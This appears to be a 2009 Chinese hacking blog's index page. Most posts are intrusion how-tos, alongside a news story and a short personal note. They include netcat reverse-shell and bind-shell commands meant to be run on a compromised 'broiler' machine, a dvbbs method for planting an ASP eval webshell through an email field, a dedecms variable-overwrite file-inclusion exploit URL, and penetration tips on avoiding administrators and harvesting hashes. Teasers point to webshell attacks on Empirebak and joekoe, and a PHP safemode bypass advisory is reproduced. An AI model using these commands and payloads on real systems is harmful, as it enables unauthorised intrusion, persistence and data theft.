NC常用命令

Posted by admin

May 31

命令1：监听命令
nc -l -p port
nc -l -p port > e:\log.dat
nc -l -v -p port
参数解释：
-l：监听端口，监听入站信息
-p：后跟本地端口号
-v：显示端口的信息，如果使用-vv的话，则会显示端口更详细的信息
提示：一般大家都爱用-vv
nc -l -p 80
这个很简单，监听80端口
如果机器上运行这个命令，端口80被认为是开放的，可以欺骗很多扫描器的哦！
nc -l -p 80 > e:\log.dat
呵呵，功能和上边一样，但是后边加了个"> e:\log.dat"我想，学过ECHO
那个命令的人都会知道吧，是在E盘创建一个log.dat的日志文件
nc -l -v -p 80
和上边命令相似，不过这次不是记录在文件里，而是会直接显示在运行着NC
的屏幕上。
呵呵，讲了这么多，来实践下
nc -l -v -p 80
然后在浏览器中输入本机IP：127.0.0.1
呵呵，看到什么？
同样，上边两个也是一样，大家自己试验一下吧
命令2：程序定向
nc -l -p port -t -e cmd.exe
本地机： nc -l -p port 或 nc -l -v -p port
目标机：nc -e cmd.exe ip port
参数解释：
-l、-p两个参数已经解释过了
-e；作用就是程序定向
-t：以telnet的形式来应答
例子
nc -l -p 5277 -t -e cmd.exe
知道运行在哪里吗？千万不要运行在自己的机器上，如果运行了，你机器
就会变成一台TELNET的服务器了，呵呵，解释一下：监听本地端口5277的
入站信息，同时将CMD.exe这个程序，重定向到端口5277上，当有人连接的时候，就让程序CMD.exe以TELNET的形式来响应连接要求。
说白了，其实就是让他成为一台TELNET的肉鸡，所以这个命令要运行在你的肉鸡上。。（话外音：说这么多遍当我们白痴啊，快往下讲！！！）
呵呵，咱们来找台肉鸡试试，我TELNET IP 5277
HOHO~~如何？
local machine：nc -l -p port ( or nc -l -v -p port )
remote machine：nc -e cmd.exe ip port Read the rest of this entry

Tags: 入侵, NC, 反弹SHELL.

dvbbs删除upload.inc后得shell得方法

Posted by admin

May 30

dvbbs删除upload.inc后得shell得方法 - 前提是得到前后台管理权限
进入后台后
先到用户管理
随便改个人的邮件地址为
<%eval request(chr(35))%>@163.com

保存后
找到邮件列表导出

然后导出邮件列表到文本把文件名的名字改为.asp

点导出，就得到了一个shell

估计有些人早就知道了
哈哈

Tags: 入侵, dvbbs, shell, upload.inc.

渗透技术几点TIPS

Posted by admin

May 30

作者：冰的原点

1、pangloin对oracle注入点的误报率偏高！

2、SQL语句有时候虽然暴错，我们的语句也有可能成功了！

3、用and user>0判断权限不准确；

4、在PCANYWHERE提权的时候常碰到连上去还要输入WIN密码，网上流传的方法操作起来不切实际，其实

连上去就等于拿到系统权限了，大家自己研究，这里提一下；

5、oracle注入不支持多句执行，如update等语句；

6、linx自动攻击器局限性很大，没有手工准确

7、内网渗透时尽量少登录3389，以免被管理员发现；

8、会免杀对渗透来说如虎添翼；

9、如果你想留住这台肉鸡，抓HASH，搞到FTP等信息都是有必要的。

10、社工的力量很强大，真的。

这是我这两天的总结，暂时想到这么多，这里想说一下，不要指望别人，指望你自己。自己研究出来的东西才是最真，用的也最习惯。

工具那东西，实在不敢恭维。希望对大家有用，和大家一起进步。

Tags: 入侵, 渗透.

dedecms 5.3的不足之处,加一鸡肋小漏!

Posted by admin

May 30

by:xhming

common.inc.php

foreach($_REQUEST as $_k=>$_v)
{
if( strlen($_k)>0 && eregi('^(cfg_|GLOBALS)',$_k) && !isset($_COOKIE[$_k]) )      //可绕过cfg_|GLOBALS限制
{
   exit('Request var not allow!');
}
}
 
       foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);        //可任意覆盖变量关键是_打头的变量
}

覆盖_FILES[]可导置本地包含漏洞(gpc/off);

例:

h tt p://127.0.0.1/dedecms/plus/vote.php?aid=1&_FILES=1&_FILES[cfg_templets_dir][name]=&_FILES[cfg_templets_dir][type]=1&_FILES[cfg_templets_dir][size]=200&&_FILES[cfg_templets_dir][tmp_name]=/dedecms/

另一处可能注入:

1
2
3

if($rs)
     {
      $bv->dsql->ExecuteNoneQuery("Update #@__member Set money=money-{$cfg_book_money} where id='{$ml->M_ID}' ");

也是利用_FILE覆盖$cfg_book_money.

Tags: 入侵, dedecms, dedecms 5.3, 注入.

帝国备份王拿shell

Posted by admin

May 30

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）
文章作者：fhod

帝国备份王(Empirebak)简介
EmpireBak是一款完全免费、专门为Mysql大数据的备份与导入而设计的软件,系统采用分卷备份与导入,理论上可备份任何大小的数据库.

可在 http://www.phome.net/ebak2008os/ 下载到

默认账号密码为
admin 123456

登陆后先备份一次数据

备份时可选择备份到的目录。。默认有个safemod Read the rest of this entry

Tags: 入侵, ebak2008os, shell, 帝国, 帝国备份王.

joekoe CMS 4.0 两个漏洞(上传漏洞+注入)

Posted by admin

May 30

乔客(joekoe) CMS 4.0 的2个高危漏洞
前段时间读了读乔客,发现在乔客4.0版本中存在两个高危漏洞,一个上传漏洞,可以随意上传任意文件,包括ASP,另一个是SQL注入,甚至还有返回错误信息,可怕啊

上传漏洞:
看\common\include\web.upload.asp 中的代码 Read the rest of this entry

Tags: 入侵, joekoe, joekoe 4.0, joekoe CMS, 上传, 注入, 漏洞.

支付宝停机

Posted by admin

May 29

本来想上去有用的...郁闷,看到这个..

Tags: 随笔, 停机, 支付宝.

女子为见男友一面在火车站前跪3个小时

Posted by admin

May 29

本报讯（记者邢阳）"见不到他，我就不起来！"昨日晚，一名女子在长春火车站前跪了3个多小时，只是想见自己的男友一面，但对方却一直没有出现。昨日22时许，记者在火车站前见到了这名痴情女子，她衣着很单薄，跪在停车场边上，在夜风中瑟瑟发抖，眼睛红肿。该女子叫王玲（化名），老家在榆树市，她说她在3年前认识了现在的男友许超（化名）。"我从小母亲就去世了，跟父亲关系也不好，我一直把他当成自己最重要的亲人。"王玲说。

据王玲介绍，一个月前，她跟许超分开后，就一直无法联系到他。"我去哈尔滨找过，还去他老家海拉尔市找过，但都没有音信。"王玲说，"后来他给我打过一次电话，我查到电话号码是长春的，我就坐车过来找他。"

昨天下午，王玲到长春后，与许超通了电话。王玲听说许超在一家台球厅工作，她找遍了附近的台球厅，但却没发现许超的踪迹。"他不肯见我，后来连我的电话也不接了，我给他发了短信说，如果他不过来，我就一直在这等着。"在交谈中，王玲透露，她已经怀孕5个月了，如果许超不来见她，她会一直跪在这等他。 Read the rest of this entry

Tags: 新闻, 女子, 怀孕.

PHP <= 5.2.9 SafeMod Bypass Vulnerability

Posted by admin

May 28

Abysssec Inc Public Advisory
Title : PHP <= 5.2.9 SafeMod Bypass Vulnerability
Affected Version : Tested on 5.2.8, 5.2.6 but previous versions maybe be afftect
Vendor Site : www.php.net

Vulnerability Discoverd by : www.abysssec.com
Description :

Here is another safemod bypass vulnerability exist in php <= 5.2.9 on windows .
the problem comes from OS behavior - implement and interfacing between php
and operation systems directory structure . the problem is php won't tell difference
between directory browsing in linux and windows this can lead attacker to ability
execute his / her commands on targert machie even in SafeMod On (php.ini setting) .

Vulnerability :

in linux when you want open a directory for example php directory you need
to go to /usr/bin/php and you can't use \usr\bin\php . but windows won't tell
diffence between slash and back slash it means there is no didffrence between
c:\php and c:/php , and this is not vulnerability but itself but because of this simple
php implement "\" character can escape safemode using function like excec .
PoC / Exploit :

orginal : www.abysssec.com/safemod-windows.zip
mirror : www.milw0rm.com/sploits/2009-safemod-windows.zip

note : this vulnerabities is just for educational purpose and showing vulnerability exist
so author will be not be responsible for any damage using this vulnerabilty.

for more information visit Abysssec.com
feel free to contact me at admin [at] abysssec.com

# milw0rm.com [2009-05-26]

Tags: 入侵, Bypass Vulnerability, PHP, PHP 5.2.9, SafeMod.

lixiaopeng's blog

NC常用命令

dvbbs删除upload.inc后得shell得方法

渗透技术几点TIPS

dedecms 5.3的不足之处,加一鸡肋小漏!

帝国备份王拿shell

joekoe CMS 4.0 两个漏洞(上传漏洞+注入)

支付宝停机

最近概况

女子为见男友一面在火车站前跪3个小时

PHP <= 5.2.9 SafeMod Bypass Vulnerability

Tags

Recent Posts

Categories

Archives

Tools

Links

May 2009
M	T	W	T	F	S	S
« Apr				Jun »
				1	2	3
4	5	6	7	8	9	10
11	12	13	14	15	16	17
18	19	20	21	22	23	24
25	26	27	28	29	30	31